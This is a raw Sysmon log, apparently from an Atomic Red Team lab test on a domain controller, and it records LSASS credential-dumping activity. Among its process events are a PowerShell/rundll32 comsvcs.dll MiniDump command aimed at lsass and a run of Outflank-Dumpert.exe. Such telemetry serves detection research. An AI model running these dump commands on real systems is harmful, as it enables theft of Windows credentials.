21:10:22.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.062{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.062{4DB9351A-A33D-60D3-5706-00000000CF01}36046444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d294bf19|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc0642|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc027d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d28972db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1d7d1ef|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1de0c61|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc2c70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc2c70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc2b01|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1db3821|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc0d63|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc08d5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc0642|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc027d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d28972db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1d7d1ef|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1de0c61 154100x800000000000000025606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.060{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" C:\windows\System32\comsvcs.dll MiniDump 628 C:\Users\ADMINI~1\AppData\Local\Temp\lsass-comsvcs.dmp fullC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full} 23542300x800000000000000025646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.859{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79E1AB647802C6B06F4B593B3D4E048E,SHA256=3B805A608DC7FD7F09EA8DC7718883839DD1BF8D260F433F3EE0C3092F1D953B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.718{4DB9351A-A33F-60D3-5A06-00000000CF01}22366892C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1b11|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1fa4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000025644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.718{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exeC:\Windows\Temp\dumpert.dmp2021-06-23 21:10:23.718 10341000x800000000000000025643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.718{4DB9351A-A33F-60D3-5A06-00000000CF01}22366892C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1d32|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+19b2|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1fa4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.703{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-A33F-60D3-5906-00000000CF01}65446880C:\Windows\system32\cmd.exe{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.698{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=69C05093EB542E1C29A556A29E74E99A,SHA256=F323569E5D64A3AA60045BD06C2421E729D1C0D79028ABA9E227D9EEAEEC62E5,IMPHASH=09D278F9DE118EF09163C6140255C690{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe" 10341000x800000000000000025634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.672{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.668{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating 